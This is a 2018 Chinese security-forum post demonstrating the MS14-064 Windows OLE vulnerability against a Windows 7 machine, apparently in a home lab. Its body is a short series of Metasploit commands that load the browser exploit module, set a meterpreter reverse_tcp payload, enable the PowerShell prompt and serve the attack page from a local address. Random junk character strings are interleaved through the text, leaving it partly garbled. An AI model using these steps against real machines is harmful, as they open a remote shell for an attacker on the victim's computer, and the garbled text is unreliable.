找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1363|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

$ L8 `: `, K: h9 f% `3 z/ r 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示% d2 b7 t2 e6 Q

3 \' @& h" \( K

c, c2 d9 T- W G3 o 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: - h( v8 Y/ \2 P+ P$ D- X

w# _7 B" W5 e

5 t7 b8 L. d7 m; Y) I' g# `( q 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp 2 |+ ^% x( n3 C0 L8 P% V; l

" p/ _. {% a' M8 A& J0 c; j

4 G$ X0 l, a3 _; {) g( N             set AllowPowershellPrompt true 7 z" T6 W4 L: f' r4 d8 k2 S

; q; Z' \+ x$ ~( u6 w: h

, p7 `- ]( e: }9 K             Set LHOST 192.168.0.109/ {; u6 @4 N6 J

8 ~& Q2 p2 E$ K7 {" h

& q& f5 w. h' X$ ^0 o             set SRVHOST 192.168.0.109# Y" L B J5 w

8 ~4 j2 a: _" {$ U

: s4 A1 @* x! z1 Y( \, s2 f; N             Set uripath share ! [( H# W+ ^8 G2 a. F- H

* d i' p* _. D

' X A0 l6 n* M3 V; F$ V' \8 t             Set srvport 80 ' I1 f+ \' g8 s7 Q' O

" w0 r: _2 e6 G, J9 H4 C

* K1 Y8 B2 ~3 W- ^3 c# O   / E' }. W7 z) B) Q5 C2 {/ A

& P+ s3 s9 U$ |; k) x

8 a% R& N5 ]1 }% P' C  " ~9 K) n4 p! J0 f O9 ~2 H2 Q# a

9 Y& F% _6 ~: U: H o' C( u

. w( P3 N- L7 y2 s  $ B0 t- d8 d" z+ S$ B0 M

( X6 f- {: y; ?7 S/ E o' d

( A3 L# T4 t( x" t, x- J J, N  5 i, g! E4 \, O, p/ b

7 o- Y [3 g. @& T; ^& ^

& g; O0 G5 b2 [. J& k- N   ' i5 w( c; }5 a4 l% v

9 C: y# [3 i4 Y/ n2 P3 z, F ^

* |) n# z# l& M+ B 下面我们来访问本地地址如图: 7 o( U! d, ^. ^: S/ Y" m

' \# {8 ?1 j8 s3 e+ C# h

; O/ \: W- u5 w4 d   $ w3 ?1 d! \/ o/ Z

& n! z0 j9 ]( q1 p c3 t1 u

# ]5 y( Q7 v U2 `. b) ^5 X   ]. \2 c3 O, F& I7 H8 F) V% A2 N/ a

) T2 b' ~. N+ x5 @5 K

- \0 s6 A) V9 A. R9 R6 ] 3 R/ |- {& R: L G+ L

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表